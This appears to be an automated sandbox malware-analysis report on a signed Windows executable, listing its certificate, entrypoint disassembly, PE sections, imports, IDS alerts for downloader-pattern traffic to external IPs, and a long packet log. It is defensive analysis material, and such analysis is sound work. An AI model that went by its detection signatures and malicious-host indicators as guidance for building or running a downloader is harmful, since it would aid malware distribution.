Error Number:	-2146762487
Not Before, Not After	23/04/2024 05:01:05 23/04/2027 05:01:05
Subject Chain	CN=Erythrophobia, O=Erythrophobia, L=Rueil-Malmaison, C=FR
Version:	3
Thumbprint MD5:	47608FE366CA4BEC8F84F14569272CA3
Thumbprint SHA-1:	5EB83A459749C2DA570D13B8C541D087EF638E66
Thumbprint SHA-256:	FB0CA4CFC0BFE02C2D499AAB5995E1E66A902751860BB009507CFB1C4A6DD8A4
Serial:	75AE44FE3C953685739EA1A890C9A7C9FB3BD845

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F25188EEA5Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F25188EEA28h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x58000	0x27ae0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe0f50	0x928
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6576	0x6600	1e4066ed6e7440cc449c401dfd9ca64f	False	0.6663219975490197	data	6.461246686118911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2e1d49b2855a89e6218e118f0c182b81	False	0.5026041666666666	data	4.044293204800279	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x58000	0x27ae0	0x27c00	44fcccfb09828564447b515fda1781b1	False	0.29796825864779874	data	4.41590745621256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x58328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2519223944161836
RT_ICON	0x68b50	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2898885852428001
RT_ICON	0x71ff8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.34117375231053604
RT_ICON	0x77480	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.36809163911195086
RT_ICON	0x7b6a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.42064315352697096
RT_ICON	0x7dc50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.48381801125703566
RT_ICON	0x7ecf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_DIALOG	0x7f160	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7f260	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x7f380	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x7f448	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7f4a8	0x68	data	English	United States	0.7596153846153846
RT_VERSION	0x7f510	0x290	MS Windows COFF PA-RISC object file	English	United States	0.5121951219512195
RT_MANIFEST	0x7f7a0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T18:43:40.022486+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49756	172.217.19.174	443	TCP
2024-11-25T18:43:50.306241+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49780	132.226.8.169	80	TCP
2024-11-25T18:43:53.368842+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49780	132.226.8.169	80	TCP
2024-11-25T18:43:55.108638+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49795	172.67.177.134	443	TCP
2024-11-25T18:43:57.587488+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49802	132.226.8.169	80	TCP
2024-11-25T18:44:01.165637+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49812	132.226.8.169	80	TCP
2024-11-25T18:44:02.858571+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49815	172.67.177.134	443	TCP
2024-11-25T18:44:06.452041+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49827	172.67.177.134	443	TCP
2024-11-25T18:44:09.842403+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49834	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 18:43:37.157191038 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:37.157232046 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:37.157315969 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:37.180975914 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:37.180994987 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:39.004813910 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:39.004882097 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:39.005942106 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:39.006009102 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:39.057338953 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:39.057358980 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:39.057805061 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:39.060894012 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:39.062551022 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:39.103328943 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:40.022500992 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:40.022555113 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:40.022569895 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:40.022609949 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:40.022785902 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:40.022811890 CET	443	49756	172.217.19.174	192.168.2.5
Nov 25, 2024 18:43:40.022850037 CET	49756	443	192.168.2.5	172.217.19.174
Nov 25, 2024 18:43:40.272870064 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:40.272902012 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:40.272977114 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:40.273267984 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:40.273279905 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:42.074491978 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:42.074585915 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:42.083993912 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:42.084012032 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:42.084263086 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:42.084322929 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:42.084862947 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:42.131325006 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.118952036 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.119024992 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.132335901 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.132405996 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.244934082 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.245043993 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.245052099 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.245104074 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.248965025 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.249020100 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.329102039 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.329188108 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.332943916 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.332995892 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.333064079 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.333106041 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.340603113 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.340656996 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.340698004 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.340740919 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.348450899 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.348495007 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.356117010 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.356175900 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.356195927 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.356244087 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.363869905 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.363913059 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.363918066 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.363960028 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.371704102 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.371789932 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.374200106 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.374296904 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.381795883 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.381870985 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.382998943 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.383064032 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.389193058 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.389250994 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.395076990 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.395137072 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.398071051 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.398124933 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.408668995 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.408739090 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.411993980 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.412050009 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.422616959 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.422775030 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.425606966 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.425672054 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.437592983 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.437661886 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.437752008 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.437994957 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.576337099 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.576433897 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.576451063 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.576517105 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.579189062 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.579255104 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.585678101 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.585745096 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.585774899 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.585833073 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.591931105 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.592019081 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.592031002 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.592091084 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.592112064 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.596375942 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.596482038 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.596564054 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.596621990 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.601088047 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.601152897 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.601166964 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.601222038 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.605422020 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.605490923 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.605515003 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.605571032 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.609880924 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.609941959 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.609956026 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.610012054 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.614365101 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.614433050 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.614629030 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.614682913 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.618774891 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.618838072 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.623234987 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.623301029 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.623378992 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.623545885 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.627788067 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.627846003 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.627929926 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.628006935 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.632479906 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.632543087 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.632566929 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.632625103 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.636708021 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.636781931 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.636795998 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.636854887 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.641484976 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.641547918 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.645662069 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.645772934 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.645792007 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.645853043 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.650769949 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.650842905 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.650883913 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.650943995 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.655905008 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.655970097 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.656054020 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.656101942 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.697854042 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.697932959 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.697947025 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.697999001 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.700798035 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.700855970 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.700876951 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.700939894 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.700959921 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.701004982 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.705265045 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.705363989 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.705451965 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.705503941 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.712151051 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.712203026 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.712240934 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.712296009 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.714273930 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.714329004 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.725712061 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.725769043 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.725819111 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.725864887 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.725898981 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.725944042 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.725972891 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.726020098 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.727829933 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.727886915 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.727988958 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.728043079 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.732115030 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.732173920 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.736310959 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.736402035 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.736407042 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.736454010 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.765360117 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.765433073 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.767426968 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.767492056 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.767573118 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.767663956 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.771892071 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.771945000 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.772078037 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.772130966 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.776417017 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.776469946 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.776627064 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.776676893 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.780909061 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.780968904 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.785348892 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.785399914 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.785443068 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.785489082 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.789865017 CET	443	49764	142.250.181.1	192.168.2.5
Nov 25, 2024 18:43:45.789915085 CET	49764	443	192.168.2.5	142.250.181.1
Nov 25, 2024 18:43:45.789963007 CET	443	49764	142.250.181.1	192.168.2.5
